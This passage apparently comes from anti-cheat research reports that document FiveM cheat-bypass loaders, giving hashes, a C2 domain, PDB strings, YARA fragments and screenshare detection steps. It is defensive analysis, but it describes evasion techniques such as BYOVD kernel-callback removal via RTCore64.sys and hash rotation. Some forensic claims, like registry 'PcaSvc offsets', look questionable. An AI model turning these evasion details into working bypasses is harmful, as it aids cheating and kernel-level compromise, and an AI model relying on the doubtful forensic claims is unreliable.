whether by the server's anti-cheat, a file scanner, or a community hash database — the operator compiles a new build that changes the file's fingerprint. The underlying functionality remains largely identical; only the compiled binary differs. This is why tracking all known variants, not just the most recent one, is essential for any detection effort intended to cover the full population of Sulution users. The loader ships with a professional-looking GUI that belies its functionally thin internals. The visual polish is aimed at buyers, not at anti-cheat researchers — a bypass that looks like commercial software is easier to sell at a premium, regardless of what is actually happening under the hood. The DPS timestamp and PcaSvc offset are the most reliable cross-build identifiers. Even when the binary hash changes, these metadata artifacts provide a persistent detection surface that survives recompilation in most cases, unless the operator also explicitly resets the linker timestamp — which Builds 1 and 2 through 3 appear not to have done consistently. Primary IOCs — All Three Build Variants --------------------------------------- 1 ### Build 1 — SHA-256 / MD5 / DPS: 2026/03/18 SHA-256: `9afb3f4b071e3052c4dc4ba9daeae0f96b5c7a162cb48a92779474f6fa2a7c5d` MD5: `e015b447ebf58f5f876e49d72e42da40` Build 1 is the earliest variant, timestamped **2026/03/18 at 19:49:16 UTC** per the PE's Digital Signature Timestamp. The associated PcaSvc offset is `0x169e000`. This build appears to have had the shortest deployment window — it was replaced within approximately 48 hours, suggesting it was detected by at least one screening method shortly after release. When checking for Build 1, compute SHA-256 using `Get-FileHash -Algorithm SHA256` on any suspicious executable and compare against the hash above. The MD5 can be used as a secondary confirmation. 2 ### Build 2 — SHA-256 / MD5 / DPS: 2026/03/20 (first) SHA-256: `df699dca9cc5c01a6ec7a43b23205f94cb486dd2868cb883d48179fc8f4b24da` MD5: `6cce9c118084fd7c010833d10e116e8d` Build 2 carries a DPS of **2026/03/20 at 19:43:53 UTC**, indicating it was compiled approximately two days after Build 1. PcaSvc offset shifts to `0x16b2000`. The change in PcaSvc offset between Build 1 and Build 2 is consistent with a code change or added import that adjusted the loader's memory layout — not merely a relink of the same object files. Build 2 and Build 3 share the same PcaSvc offset, which suggests Builds 2 and 3 are compiled from the same source tree with only minor surface-level modifications such as resource section changes or embedded string alterations to defeat hash-based detection. 3 ### Build 3 — SHA-256 / MD5 / Shared PcaSvc with Build 2 SHA-256: `acd3124236b3d32093eabcf3eeae758b6bc65ffe564b0eb3bd89ab82b8f9b5dd` MD5: `c9137c8c968e7ed211d5244c556a3385` Build 3 shares PcaSvc offset `0x16b2000` with Build 2, confirming they originate from the same source revision. The hash difference indicates a superficial binary mutation — likely a resource section or embedded timestamp modification rather than a functional code change. This is a common quick-rotation strategy to defeat file-hash-only blocklists. When all three builds are blocked by hash, analysts should monitor for a fourth variant. The operator's demonstrated 48-hour turnaround suggests a fourth build would arrive quickly if the existing three are flagged simultaneously. 4 ### DPS Timestamp Window: 2026/03/18–20 All three builds fall within a two-day compile window. The DPS (Digital Signature Timestamp or PE TimeDateStamp) can be inspected using PE analysis tools such as DIE (Detect-It-Easy), pestudio, or the PowerShell command: `[System.IO.File]::ReadAllBytes("suspect.exe") | Select-Object -First 512` Any suspicious executable carrying a PE TimeDateStamp between March 18 and March 20, 2026 that cannot be attributed to a known legitimate application should be submitted for hash verification against all three Sulution builds. The timestamp alone is not definitive — it must be combined with hash or PcaSvc offset confirmation. 5 ### PcaSvc Registry Entry and Offset Correlation The Program Compatibility Assistant service (PcaSvc) records execution metadata for applications in the registry under`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers` and related keys. The PcaSvc offset values documented for Sulution builds — `0x169e000` (Build 1) and `0x16b2000` (Builds 2 and 3) — are derived from the binary's compatibility shim mapping. During a screenshare, instruct the reviewer to search the registry for entries matching these offsets. Their presence, particularly when the associated executable path is not a known application, is a strong corroborating signal. The PcaSvc records persist even after the executable is deleted, making them a useful post-execution artefact. Multi-Build Tracking: Why All Variants Matter --------------------------------------------- A common mistake in bypass detection is maintaining only the most recently identified build in a blocklist. This approach fails against operators who distribute multiple build versions simultaneously to different buyer tiers or geographic regions. Sulution appears to have done exactly this: there is no guarantee that all three builds were deployed sequentially rather than in parallel. A user who purchased in the first wave may be running Build 1 while a user who purchased two days later is running Build 3. Maintaining a complete variant catalogue also enables clustering analysis. When multiple confirmed bypass users on the same server are found with different builds but identical PcaSvc offsets, this pattern points to a shared source — valuable intelligence for identifying the operator's distribution channels. Partial build coverage breaks the clustering signal. The Build 2 → Build 3 transition is particularly instructive. The shared PcaSvc offset and identical functionality, combined with different hashes, confirms that the Sulution operator understands hash-based detection and responds with surface-level binary mutations. Future builds from this operator are likely to follow the same pattern: functional code stays constant, surface fingerprints rotate. YARA rules targeting functional code patterns or embedded strings will outlast hash-only blocklists. Analysts tracking Sulution should maintain all three hashes indefinitely. Users running older builds are still using a bypass; the age of their specific variant does not reduce the severity of the infraction or change the detection outcome. Screenshare Check Methodology ----------------------------- 1 ### Compute SHA-256 of Any Suspicious Executable Ask the player to open PowerShell and run `Get-FileHash "path\to\file.exe" -Algorithm SHA256`. Compare the output against all three Sulution build hashes. If any match is found, the check is complete — do not proceed further before flagging and documenting the finding. If no direct match is found but the executable is still suspicious (unusual name, path, or recent timestamp), proceed to the DPS check. A future Sulution build may carry a new hash not yet in this database. 2 ### Inspect PE Timestamp Using DIE or pestudio Ask the player to open Detect-It-Easy (DIE) and load the suspicious file. The PE header timestamp displayed in DIE's info panel should be noted. Any file showing a compile timestamp in the March 18–20, 2026 range that is not a known legitimate application should be treated as a Sulution candidate, pending hash and PcaSvc confirmation. DIE is portable and requires no installation, making it suitable for use during a screenshare where the player may be unwilling to install additional software. Alternatively, pestudio can be used if already present on the system. 3 ### Check PcaSvc Registry for Offset Signatures Open Registry Editor (regedit) and navigate to`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags`. Search for any entries referencing unknown executable paths. PcaSvc entries for Sulution builds will reference the loader's drop path and can persist even after the file itself has been deleted. The offsets `0x169e000` and `0x16b2000` appear in binary registry value data. Use a hex-aware registry viewer or export the key to a .reg file and search for the hex strings to locate matching entries. 4 ### Search Prefetch for Sulution Loader Executions Navigate to `C:\Windows\Prefetch\` and look for .pf files whose names correspond to recently run executables that cannot be identified as legitimate applications. Prefetch files record the last eight execution timestamps and the list of DLLs loaded during each run. Even if the Sulution executable itself has been deleted, its prefetch file may remain. Open the .pf file with WinPrefetchView to extract the original executable path and run timestamps. This provides post-deletion evidence of bypass execution. 5 ### Loader GUI Identification — Visual Pattern If the bypass is still present on disk and the player attempts to demonstrate they are not cheating, they may open various folders. The Sulution loader ships with a professional-looking GUI window. If you observe an application window that claims to be a "solution" or "bypass" product — misspelled or not — with a clean dark-themed UI but no clear legitimate application purpose, this is a strong visual indicator to request immediate hash verification. The GUI's professional appearance is a social engineering element aimed at players who might otherwise be suspicious of crude tools. Do not let polished presentation deter you from running the hash check — visual quality has no bearing on the file's identity. Detection Notes --------------- The most operationally important characteristic of Sulution is the speed of its build rotation. A single-hash blocklist will be stale within 48 hours of a new build release. Detection infrastructure should be hash-set based, covering all known variants simultaneously, supplemented by behavioral or structural YARA rules that target the loader's functional code rather than its surface fingerprint. PcaSvc offset correlation is the most durable signal currently available for Sulution detection. Until the operator explicitly changes their build configuration to produce a different memory layout, the documented offsets will match new builds compiled from the same source tree. Monitor for offset changes as an indicator of a more substantial source revision. The "Sulution" misspelling in the vendor name is worth noting for attribution purposes: it appears consistently across marketing materials, the loader GUI, and any associated online presence. Searching for this specific misspelling on Discord servers, forums, or Telegram channels can surface distribution channels and buyer communities, which in turn enables broader player identification before a screenshare is even requested. --- # XYZ Corp Bypass: Randomised Executable with xyzcorporation.xyz C2 | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 XYZ Corp Bypass: Randomised Executable with xyzcorporation.xyz C2 ================================================================= XYZ Corp generates a randomly-named executable — `ear6tkyel9rv.exe` in the observed sample — and drops it directly in `AppData\Local` with no subdirectory. The random filename is weak OPSEC: the hardcoded C2 domain `xyzcorporation.xyz` and a stable DPS timestamp expose every build regardless of what the file is named. FiveMBypass DetectionRandom FilenameC2 DomainIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- The XYZ Corp bypass presents an interesting case study in the limits of filename randomisation as an evasion strategy. The operator generates a pseudo-random alphanumeric filename — the observed sample is `ear6tkyel9rv.exe`, 12 characters with mixed letters and digits — and drops the executable directly into `C:\Users\Administrator\AppData\Local\`. There is no subdirectory, no folder hierarchy to add legitimacy, and no attempt to mimic a real application name. This approach correctly anticipates that hash-based detection will fail if the filename changes on each deployment. However, the operator made a critical error: the C2 domain `xyzcorporation.xyz` is hardcoded into every binary. A domain is far more expensive to rotate than a filename — it requires purchasing a new domain, updating DNS, redistributing the loader to all active users, and waiting for propagation. As a result, the C2 domain is the most durable detection anchor available. The binary is a 20.14 MB AMD64 PE with six sections, compiled as of **2026/03/06 at 14:38:43 UTC** per the DPS timestamp. The file size of 20.14 MB (21,118,464 bytes) is consistent with a packed or resource-heavy loader, potentially embedding the bypass payload in a resource section rather than loading it from disk separately. Detection does not require knowing the current randomised filename. DNS query logs, lsass network connection state, and the AppData\\Local drop path pattern — a 12-character random filename at the root of LocalAppData — are all detectable without prior knowledge of the specific filename in use. Primary IOCs ------------ 1 ### File Hash — SHA-256, SHA-1, MD5 SHA-256: `6cb47876cd00d14ba9c5a85f9b2ccbc91e34c13190feb1c099310f6969bd35c0` SHA-1: `230ff8ef83c794bc0abacb0570dd66e5a00ed113` MD5: `018601ba436c1ad41b3f52384696251f` These hashes apply to the observed `ear6tkyel9rv.exe` sample. Future deployments will carry different hashes due to filename-based packing variations, but this sample's hashes are definitive for any instance where the same binary was distributed to multiple users before recompilation. File size is 21,118,464 bytes (20.14 MB) — this distinctive size alone narrows the field significantly during an AppData\\Local sweep. 2 ### DPS Timestamp — 2026/03/06:14:38:43 The PE TimeDateStamp for the observed build is **2026/03/06 at 14:38:43 UTC**. This timestamp is embedded in the PE header's Optional Header and is readable by any PE analysis tool including DIE, pestudio, or CFF Explorer. Unlike NTFS file timestamps, the PE header timestamp is set at compile time and reflects when the linker produced the binary. A random-named executable in AppData\\Local with a compile timestamp in early March 2026 and a file size near 20 MB should be immediately treated as a high-priority sample for further analysis. Submit to VirusTotal and run hash comparison against documented XYZ Corp hashes. 3 ### PcaSvc Entry — Offset 0x142b000 The observed sample carries PcaSvc offset `0x142b000`. PcaSvc registry entries persist after the executable is removed from disk, providing a forensic record of execution even if the player attempts to clean up before or during a screenshare. Check `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers` and related AppCompat keys for entries referencing random-named executables in AppData\\Local. The presence of such an entry without a corresponding legitimate application is a strong post-execution indicator. 4 ### AppData\\Local Root Drop — No Subdirectory Pattern A legitimate application that drops a file in AppData\\Local will almost always create a named subdirectory (e.g.,`AppData\Local\Discord\` or`AppData\Local\Google\Chrome\`). Dropping an executable directly at the root of AppData\\Local with a random 12-character name is not a pattern used by any known legitimate software. This combination — root drop, random name, no company subfolder — is a reliable heuristic for identifying bypass loaders in this family. During a screenshare, ask the player to open their AppData\\Local directory and sort by Type. Any .exe files at the root level — not inside a named application subfolder — should be hashed immediately, regardless of their filename. 5 ### C2 Domain in DNS Query History — xyzcorporation.xyz The C2 domain `xyzcorporation.xyz` is hardcoded in the binary and will appear in the system's DNS cache if the loader has communicated with the C2 server. Run: `ipconfig /displaydns | findstr /i "xyzcorporation"` If the domain appears in the DNS cache, the loader has executed and established C2 contact. The DNS cache is typically flushed on reboot; if the player rebooted before the screenshare, absence from the DNS cache does not rule out prior execution. Check browser history, Windows Firewall logs, and Event Log for outbound connection attempts to corroborate. 6 ### C2 Domain in lsass Network Connections If the bypass is currently active, its injected component may maintain a persistent connection to `xyzcorporation.xyz`. In System Informer, navigate to the Network tab and look for any established TCP connection to an IP address that resolves to this domain. Alternatively, use TCPView to enumerate all active connections and resolve remote addresses in real time. A connection attributed to an unusual process — particularly lsass, explorer, or a process running from AppData — that terminates to an IP address hosting `xyzcorporation.xyz` is definitive evidence of active bypass operation. Screenshot and record the connection details before the player has an opportunity to terminate the process. Screenshare Check Methodology ----------------------------- 1 ### Open AppData\\Local and Sort Executables by Date Ask the player to press `Win+R`, type`%localappdata%`, and press Enter. In the resulting Explorer window, set the view to Details and sort by Date Modified descending. Any .exe file at the root level — not inside a named application folder — should be immediately noted and hashed. Request that the player show the full Name and Date Modified columns without truncation. Watch for files with random-looking alphanumeric names (10–15 characters, mixed case and digits) that were modified within the past month. 2 ### Run DNS Cache Query for xyzcorporation.xyz Ask the player to open Command Prompt and run `ipconfig /displaydns`. Instruct them to scroll through the output slowly, or pipe it to a text file and open that file for easier review:`ipconfig /displaydns > dns_cache.txt && notepad dns_cache.txt`. Search for "xyz" in the Notepad view. Any record for xyzcorporation.xyz or subdomains thereof is a confirmed IOC. 3 ### Check TCPView for Active C2 Connection Ask the player to open TCPView (Sysinternals). Allow it to resolve addresses. Scan the Established connections for any remote address that resolves to `xyzcorporation.xyz` or its registered IP range. If a connection is found, note the process name and PID, then cross-reference in Task Manager or System Informer to confirm whether the owning process is the random-named executable or an injected host process. 4 ### Hash Any Suspicious AppData\\Local Executables For any .exe found at the root of AppData\\Local, compute SHA-256 and compare against the documented XYZ Corp hash. PowerShell command: `Get-FileHash "$env:LOCALAPPDATA\ear6tkyel9rv.exe" -Algorithm SHA256` Replace the filename with whatever random name is observed. The file size (approximately 20 MB) is a quick pre-filter: ask the player to check the file size in Properties before investing time in a full hash computation. 5 ### Inspect PE Header Timestamp with DIE If a suspicious executable is found, ask the player to open Detect-It-Easy and drag the file in. Expand the PE header section and note the TimeDateStamp field. A value of **2026/03/06 14:38:43** confirms this is the documented XYZ Corp build even before a hash comparison is complete. DIE also displays the number of PE sections (six for this sample) and the CPU architecture (AMD64). These secondary characteristics provide additional confirmation points beyond the timestamp alone. Detection Notes --------------- The XYZ Corp operator has correctly identified that hash-based detection fails against randomised filenames, but has failed to account for the fact that behavioral and network-layer detection is immune to filename changes. The C2 domain is the highest-value IOC in this family precisely because it cannot be changed without a coordinated infrastructure migration — a much higher operational cost than recompiling with a new random filename. Server administrators with access to network monitoring should add `xyzcorporation.xyz` to their DNS blocklist or network-level threat intelligence feeds. Any player whose client machine attempts to resolve this domain during or adjacent to a FiveM session should be flagged for screenshare review regardless of whether a matching executable is found on disk. The use of the Administrator account's AppData path (`C:\Users\Administrator\AppData\Local\`) rather than the current user's profile suggests the bypass may be designed for systems where the user runs as Administrator, or that the sample was captured in a VM or test environment configured with the default Administrator account. Reviewers should check both the Administrator and the current user's AppData\\Local directories. --- # Genesis Bypass: pwahelper.exe with Genesis-Rework Hook PDB String | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Genesis Bypass: pwahelper.exe with Genesis-Rework Hook PDB String ================================================================= Genesis masquerades as `pwahelper.exe` — a browser Progressive Web App component — while carrying a fully intact PDB path string of `Genesis-Rework\loader\x64\Release\hook.pdb` in the release build. The forgotten debug artifact makes this one of the easiest bypasses to identify via strings analysis alone. FiveMBypass DetectionPDB ArtifactYARApwahelper.exe Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Genesis is a FiveM bypass loader built around a browser component masquerade. The filename`pwahelper.exe` is associated with Progressive Web App (PWA) support infrastructure in Chromium-based browsers — Edge, Chrome, and Electron applications all ship variants of this helper binary. The goal of using this name is to create ambient confusion: a reviewer who sees pwahelper.exe in a process list or file listing may assume it belongs to a browser and move on without investigation. The masquerade is immediately undermined by one critical oversight: the developer shipped the release build without stripping the PDB path from the binary. The string`C:\Users\8888\Desktop\Genesis-Rework\loader\x64\Release\hook.pdb` is present verbatim in the binary. "Genesis-Rework" appears to be the project name — possibly a rebuild or fork of an earlier Genesis loader variant — and "hook.pdb" confirms this is the hooking component of the loader chain rather than a supporting utility. The binary is 462.50 KB (473,600 bytes), a 64-bit PE executable. Its compact size is consistent with a focused injection hook rather than a full-featured loader with embedded payloads. The import table confirms this: VirtualAllocEx, VirtualFreeEx, WriteProcessMemory, and GetExitCodeThread are all present — this is the classic userland DLL injection API set. The binary allocates memory in a remote process, writes the payload, and executes it. The YARA imphash for this sample is `599253441bf17fc669123598807625dc`. Imphash is computed from the import table and provides a fingerprint that is stable across binaries compiled from the same source with the same imports, even if the binary's content differs in other respects. Matching on imphash can surface builds not yet catalogued by their SHA-256. Primary IOCs ------------ 1 ### File Hash — SHA-256, SHA-1, MD5, and VirusTotal SHA-256: `93780adffbda11803c3a6f40730403d09495dd85877700503894f48c1e36a958` SHA-1: `7d4324a0ecaf898627d41fec3141be840dc2393e` MD5: `877d471006155daf5614bf60de06a629` Submit the SHA-256 to VirusTotal immediately when this sample is encountered. Detection coverage for this binary has been established across multiple AV engines. A high VT detection rate combined with a filename of pwahelper.exe found outside of a known browser installation path is conclusive evidence of bypass activity. 2 ### pwahelper.exe Path Anomaly — Outside Browser Directories Legitimate `pwahelper.exe` instances reside within specific browser installation directories: `C:\Program Files (x86)\Microsoft\EdgeWebView\Application\[version]\ C:\Program Files\Google\Chrome\Application\[version]\ C:\Users\[user]\AppData\Local\Microsoft\Edge\Application\[version]\` Any `pwahelper.exe` found outside of these paths — on the Desktop, in AppData root, in a game directory, or in any ad-hoc folder — is not a browser component. The file size is also a quick discriminator: legitimate Edge/Chrome pwahelper binaries are typically under 2 MB; the Genesis sample is 462.50 KB, within that range but with a very different import profile. 3 ### PDB String Discovery via DIE or strings Analysis The most definitive non-hash identification method is extracting the PDB path string from the binary. In Detect-It-Easy, open the file and navigate to the Strings section. Filter for ".pdb" — the string`Genesis-Rework\loader\x64\Release\hook.pdb` will appear in the output. Alternatively, use Sysinternals Strings.exe:`strings64.exe -n 10 pwahelper.exe | findstr /i "genesis pdb hook"`. The presence of "Genesis-Rework" in a file named pwahelper.exe is an immediate and unambiguous identification — no further analysis is required to confirm the file is malicious. 4 ### DPS Timestamp — 2026/03/21:08:18:16 The PE TimeDateStamp is **2026/03/21 at 08:18:16 UTC**, approximately 13 hours before the Stainless bypass documented in the adjacent report — suggesting active bypass development activity on the same date across multiple operators. The PcaSvc offset is `0x79000`, consistent with the binary's small footprint. A pwahelper.exe with a compile timestamp from March 2026 should be treated as suspect unless it can be positively identified as a browser update artifact — verifiable by checking the browser's own version history and whether an update was applied on that date. 5 ### PcaSvc Entry — Offset 0x79000 Check AppCompatFlags registry keys for PcaSvc entries referencing pwahelper.exe. The offset`0x79000` in binary data within the registry value corresponding to a pwahelper.exe entry outside of a browser path confirms execution of this specific build. PcaSvc records are created at first execution and persist until the registry key is manually cleared. Even if the player has deleted the pwahelper.exe file, the PcaSvc entry documents that it was run on this system — providing post-deletion forensic evidence suitable for ban enforcement. 6 ### YARA Imphash — 599253441bf17fc669123598807625dc The imphash `599253441bf17fc669123598807625dc` is computed from the binary's import address table. A YARA rule targeting this imphash will match any binary compiled from the same source with the same imports, regardless of surface-level changes to the binary's content, packing, or filename. This makes it particularly useful for identifying future Genesis builds that retain the same core injection API set. YARA rule fragment:`condition: pe.imphash() == "599253441bf17fc669123598807625dc"`Combine with the PDB string rule for maximum specificity. The union of both conditions should have a near-zero false positive rate against any clean binary corpus. PDB Strings as Reliable YARA Anchors ------------------------------------ PDB (Program Database) files are generated by the Visual C++ compiler and linker to store debug symbol information including source file paths, variable names, and line numbers. In release builds, the PDB file itself is typically not distributed — but the path to that PDB file is embedded in the PE binary in the `.rdata` or debug directory section. This path reflects the developer's local filesystem at compile time. For a YARA analyst, a PDB path string has several highly desirable properties as a detection anchor. First, it is highly specific: the combination of developer username, project directory name, and subpath is essentially unique to one developer's machine and one project. Second, it is stable across builds: unless the developer explicitly strips PDB references (a deliberate compilation flag) or restructures their project directory, the string remains identical across every binary built from that project. Third, it survives most packing attempts: packers that compress or encrypt the binary's code section typically do not process the debug directory, leaving PDB strings readable in plaintext in the packed binary. The Genesis-Rework PDB path is an exceptionally strong anchor. The string`Genesis-Rework` does not appear in any known legitimate application. A YARA rule matching on this substring will never produce a false positive against a clean system and will catch every build from this project until the developer renames their working directory — a change they may not think to make if they are unaware that the PDB path is embedded in their binary. The developer username "8888" visible in the path`C:\Users\8888\` is unusual — a four-digit numeric username suggests either a deliberately anonymized development account or a locale-specific naming convention. This username is stable across all builds from this machine and can be used as an additional YARA condition for attribution purposes. Bypass developers who become aware of PDB path exposure typically respond by adding the `/PDBSTRIPPED` linker flag or using a build step that zeros the debug directory. Until Genesis-Rework developers implement this measure, the PDB string remains the most reliable and forensically defensible identification method for this bypass family. Screenshare Check Methodology ----------------------------- 1 ### Search for pwahelper.exe Outside Browser Paths Ask the player to open PowerShell and run: `Get-ChildItem -Path C:\ -Filter "pwahelper.exe" -Recurse -ErrorAction SilentlyContinue | Select-Object FullName, LastWriteTime, Length` Review each result. Any pwahelper.exe not located within a versioned browser application directory is anomalous and should be hashed immediately. The file size (462.50 KB / 473,600 bytes) distinguishes the Genesis sample from legitimate browser pwahelper builds, which typically differ in size. 2 ### Extract PDB String with Strings.exe or DIE For any suspicious pwahelper.exe, ask the player to run Detect-It-Easy or Sysinternals Strings.exe. In DIE, open the file and view the Strings output filtered to ".pdb". In Strings.exe: `strings64.exe pwahelper.exe | findstr /i "genesis rework hook pdb"` If the Genesis-Rework PDB path appears in the output, the identification is complete. Screenshot the full string output for documentation. No hash comparison is needed once this string is confirmed — it is uniquely identifying on its own. 3 ### Inspect the Import Table for Injection APIs Open the suspicious pwahelper.exe in CFF Explorer, pestudio, or DIE and navigate to the Imports section. Look for the presence of all four documented injection APIs: VirtualAllocEx, VirtualFreeEx, WriteProcessMemory, and GetExitCodeThread. A legitimate pwahelper.exe has no need for remote process memory allocation or write primitives. The presence of this import combination in a pwahelper binary is functionally impossible to explain as legitimate behavior and constitutes independent confirmation of malicious intent without requiring the PDB string or hash match. 4 ### Check PE Timestamp and PcaSvc Registry Verify the PE compile timestamp in DIE's info panel. A value of **2026/03/21 08:18:16** confirms the Genesis sample. Cross-reference with PcaSvc registry entries: open regedit and search in`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags` for any entry referencing a pwahelper.exe outside of browser paths. If the player claims the file is old and was not recently executed, the PcaSvc record will still show the execution timestamp. The absence of a corresponding browser update on that date in the browser's own history further confirms the execution was not part of a legitimate browser update workflow. 5 ### Compute SHA-256 and Cross-Reference Hash Database Run: `Get-FileHash "path\to\pwahelper.exe" -Algorithm SHA256` Compare against the documented hash`93780adffbda11803c3a6f40730403d09495dd85877700503894f48c1e36a958`. Also submit to VirusTotal for community detection coverage. Any VT result showing high-confidence bypass-family detections on a file the player cannot legitimately explain confirms the infraction. Document the VT URL and detection summary alongside the hash and PDB string evidence. Detection Notes --------------- Genesis is unusual in the bypass landscape because it provides three overlapping, independent detection surfaces that all survive hash rotation: the PDB string, the imphash, and the path anomaly pattern. A new build would need to simultaneously strip PDB references, change the injection API set, and modify the filename strategy to defeat all three. That level of coordinated evasion would constitute a substantial rewrite rather than a routine build rotation. The pwahelper.exe masquerade is plausible in environments where reviewers are not methodical about path verification. Chromium-based browsers are nearly ubiquitous on Windows gaming PCs, and the mental model of "browser helper = safe" is deeply ingrained in non-technical users. Reviewers must establish a practice of always checking the full path of any process or file with a browser-sounding name, not just the filename itself. The compact 462.50 KB file size warrants note: this binary is a hook/injection component, not a standalone bypass. There is likely a companion loader or installer that drops this file and orchestrates the injection. A complete investigation should attempt to identify the parent process that launched pwahelper.exe, as that parent process is likely the primary bypass loader and may carry additional IOCs not present in this component alone. --- # Stainless Bypass: telephon.cpl with RTCore64 BYOVD Chain | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Stainless Bypass: telephon.cpl with RTCore64 BYOVD Chain ======================================================== Stainless presents as a Control Panel applet (`telephon.cpl`) but functions as an AMD64 DLL that loads the RTCore64.sys vulnerable driver to disable kernel callbacks — a Bring Your Own Vulnerable Driver (BYOVD) chain. PDB artifacts expose the developer's desktop path, including a subdirectory labeled "bypass gringo." FiveMBypass DetectionBYOVDRTCore64YARA Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Stainless is among the more technically sophisticated FiveM bypasses documented in this research series. Rather than relying on userland injection or simple loader tricks, it employs a Bring Your Own Vulnerable Driver (BYOVD) chain: the binary loads`RTCore64.sys`, a legitimately signed but vulnerable ASUS GPU Tweak II driver, and exploits its kernel-mode write primitive to disable anti-cheat kernel callbacks. This approach bypasses user-mode protection entirely by operating at the kernel level before the anti-cheat has an opportunity to establish its monitoring hooks. The binary presents as `telephon.cpl` — a Control Panel applet extension, typically associated with the Windows telephony configuration applet. CPL files are DLLs with the EXECUTABLE\_IMAGE characteristic set and a `CPlApplet` export. Running a CPL file directly is unusual user behavior and is not something a normal user would do as part of routine computer use, making it an inherently suspicious execution event in any logging system. The developer left their full desktop PDB path in the release build:`C:\Users\ddrac\Desktop\bypass gringo\x64\Release\stainless.pdb`. The "bypass gringo" directory name is unusual and suggests a Spanish-speaking developer — "gringo" is a colloquial Spanish term for a foreigner, typically North American. The PDB string survives in the release binary because the developer did not strip debug symbols from the build, which is a common oversight in unprofessional bypass operations. In addition to RTCore64.sys, the binary embeds path strings for two additional vulnerable drivers: AsUpIO.pdb and iqvw64e.pdb (the latter being the Intel Network Adapter Diagnostics driver, another commonly used BYOVD target). This suggests Stainless either has fallback driver logic or was designed to support multiple BYOVD chains. Primary IOCs ------------ 1 ### File Hash — SHA-256, SHA-1, MD5 SHA-256: `9104158b8ee2f545697504a368be7fd264cadac2ed38ecd80a8dcc9f42e27097` SHA-1: `9de9d0bd5f9595b2fb6011447b434886398025e6` MD5: `a229fa1a200ee5338ede3bbeba84cb2b` The binary is 6.35 MB, AMD64, presented as a DLL with the EXECUTABLE\_IMAGE characteristic. Compute SHA-256 using PowerShell's`Get-FileHash` and compare against the above values. The relatively small file size for a BYOVD loader reflects efficient construction — the driver itself is loaded from disk rather than embedded in the binary. 2 ### DPS Timestamp — 2026/03/21:21:37:36 The PE TimeDateStamp is **2026/03/21 at 21:37:36 UTC**. This timestamp is embedded in the COFF header and readable by any PE inspection tool. The PcaSvc offset is `0x660000`, which is notably smaller than other documented bypass offsets, consistent with the binary's 6.35 MB footprint. Any CPL file found on disk with a compile timestamp in late March 2026 and no legitimate telephony or control panel purpose should be treated as a Stainless candidate. CPL files at unusual paths — outside of System32 and SysWOW64 — are inherently anomalous and warrant immediate hash verification. 3 ### PcaSvc Entry — Offset 0x660000 The PcaSvc offset `0x660000` will appear in AppCompat registry records if the telephon.cpl binary was executed on the system. As with other bypasses in this series, PcaSvc records persist after file deletion. Search AppCompatFlags registry keys for any CPL-related entries that reference paths outside of the Windows system directories. A CPL file executed from Desktop, Downloads, AppData, or any game directory is a clear anomaly that should be flagged regardless of the specific filename. 4 ### RTCore64.sys Presence on Disk After execution, Stainless drops or references `RTCore64.sys` on disk. This driver file is not a standard Windows component. Run a filesystem search for this filename: `Get-ChildItem -Path C:\ -Filter "RTCore64.sys" -Recurse -ErrorAction SilentlyContinue` Any instance of RTCore64.sys on a gaming PC with no legitimate ASUS GPU Tweak II installation is a critical finding. The driver may be placed in temp directories, the Windows driver store, or custom paths specified by the bypass loader. Its presence alone — combined with absence of the ASUS application that legitimately ships it — is strong evidence of BYOVD activity. 5 ### YARA — stainless.pdb String in Binary The string `stainless.pdb` appears in the binary as part of the full PDB path `C:\Users\ddrac\Desktop\bypass gringo\x64\Release\stainless.pdb`. This string is a highly specific YARA anchor. A rule matching on this substring will identify all copies of this binary regardless of filename changes or superficial packing: `strings: $pdb = "stainless.pdb" nocase ascii condition: $pdb` The full path string including "bypass gringo" is even more specific and less likely to produce false positives. Include both the short and full path variants in any deployed YARA rule set. 6 ### YARA — RTCore64 Driver Path Strings in Binary In addition to the PDB string, Stainless embeds filesystem path references to the RTCore64 driver and companion vulnerable drivers (AsUpIO.pdb, iqvw64e.pdb). These strings appear in the binary's data or rdata section and are detectable with a strings analysis tool or YARA rule. Running: `strings telephon.cpl | findstr /i "RTCore64"` will reveal path references if present. A YARA rule anchoring on the RTCore64 driver name string within a non-driver binary provides a second detection layer that catches the binary even if the PDB section is stripped in a future build. The combination of both rules ensures detection robustness across build iterations. RTCore64 and BYOVD: What It Means for Detection ----------------------------------------------- Bring Your Own Vulnerable Driver (BYOVD) attacks abuse the Windows kernel's driver loading mechanism. A legitimately signed driver from a hardware vendor — in this case, RTCore64.sys from ASUS — contains a vulnerability (typically an arbitrary kernel-mode read/write primitive exposed through IOCTL) that an attacker can exploit to operate with kernel-level privileges without writing their own unsigned driver. RTCore64.sys is one of the most widely documented BYOVD targets. It exposes a kernel memory read/write interface that Stainless uses to disable anti-cheat kernel callbacks — specifically, the PsSetLoadImageNotifyRoutine and similar callbacks that anti-cheat software registers to monitor process and module loading events. Once these callbacks are removed, the anti-cheat loses visibility into subsequent injection activity. Detection of BYOVD activity at the kernel level requires EDR or kernel callback monitoring, which may not be available during a standard screenshare session. However, the artifacts left on disk and in registry are detectable through standard user-mode tools: the driver file itself, the service registry entry created to load the driver, and the PcaSvc records for telephon.cpl are all accessible without kernel-level tooling. Note that Microsoft has added RTCore64.sys to the Windows Driver Block List (WDAC policy) in recent updates. On fully patched Windows 11 systems, loading this driver should be blocked by the kernel. However, players using bypass software often disable or configure around WDAC policies as part of their setup, so the presence of a loaded RTCore64 driver on a gaming machine should still be treated as a critical finding. Screenshare Check Methodology ----------------------------- 1 ### Search Filesystem for telephon.cpl Outside System32 Legitimate telephon.cpl lives in `C:\Windows\System32\` and`C:\Windows\SysWOW64\`. Run in PowerShell: `Get-ChildItem -Path C:\ -Filter "telephon.cpl" -Recurse -ErrorAction SilentlyContinue | Select-Object FullName, LastWriteTime, Length` Any result outside of the System32/SysWOW64 directories is anomalous. Hash 